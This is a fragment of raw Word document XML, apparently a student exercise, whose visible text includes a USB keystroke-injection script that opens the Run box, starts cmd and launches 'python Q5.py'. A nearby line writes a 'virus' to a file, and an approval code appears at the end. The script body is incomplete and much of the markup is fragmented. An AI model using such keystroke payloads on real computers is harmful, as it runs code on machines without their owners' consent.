      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009A4D41">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>f.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009A4D41">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(virus)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4D4CDB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728A24E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CTRL s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B7A13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750</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B0A467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Q5.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9FF310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500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693C792A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50011D9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1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DA1CAD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GUI r</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8AF05E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500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C33FF9F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 xml:space="preserve">STRING </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A4D41">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="41E23673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1E4FC2C1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lastRenderedPageBreak/>
        <w:t>DELAY 1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EF2BF2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cd C:\Users\tomkm\Desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1675C7D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3F8076B8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DELAY 250</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E575519" w14:textId="77777777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STRING python Q5.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FE20F2" w14:textId="37687B45" w:rsidR="009A4D41" w:rsidRPr="009A4D41" w:rsidRDefault="009A4D41" w:rsidP="009A4D41">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A4D41">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ENTER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D293621" w14:textId="02C6D5F7" w:rsidR="008B7F1C" w:rsidRPr="00FC4766" w:rsidRDefault="00FC4766" w:rsidP="00FC4766">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC4766">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Approval Code: </w:t>
      </w:r>
      <w:r w:rsidR="008B7F1C" w:rsidRPr="00FC4766">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DNYZMR</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="008B7F1C" w:rsidRPr="00FC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276"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="59F20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CEB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5362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15BE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BA0E50DE"/>
    <w:lvl w:ilvl="0" w:tplc="BEFA25B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77BD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="151C1818"/>
    <w:lvl w:ilvl="0" w:tplc="A76431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6977"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="808CEF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041806">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1131942061">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1800537073">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="62605976">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="32501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3B"/>
    <w:rsid w:val="00035E99"/>
    <w:rsid w:val="000E0E7E"/>
    <w:rsid w:val="002F41B3"/>
    <w:rsid w:val="00614F27"/>
    <w:rsid w:val="00702EEE"/>
    <w:rsid w:val="007F05BE"/>
    <w:rsid w:val="00806332"/>
    <w:rsid w:val="008B7F1C"/>
    <w:rsid w:val="009A4D41"/>
    <w:rsid w:val="00A104AB"/>
    <w:rsid w:val="00BA657F"/>
    <w:rsid w:val="00BF6461"/>
    <w:rsid w:val="00C0163B"/>
    <w:rsid w:val="00D607EC"/>
    <w:rsid w:val="00E93F27"/>
    <w:rsid w:val="00F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FA0"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{83871BFC-1270-4ADA-824C-0DE44CE1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1C"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Normal0">
    <w:name w:val="Normal0"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00A104AB"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="256" w:lineRule="auto"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11</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-10-02T17:01:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-06T15:30:00Z</dcterms:modified>
</cp:coreProperties>
</file>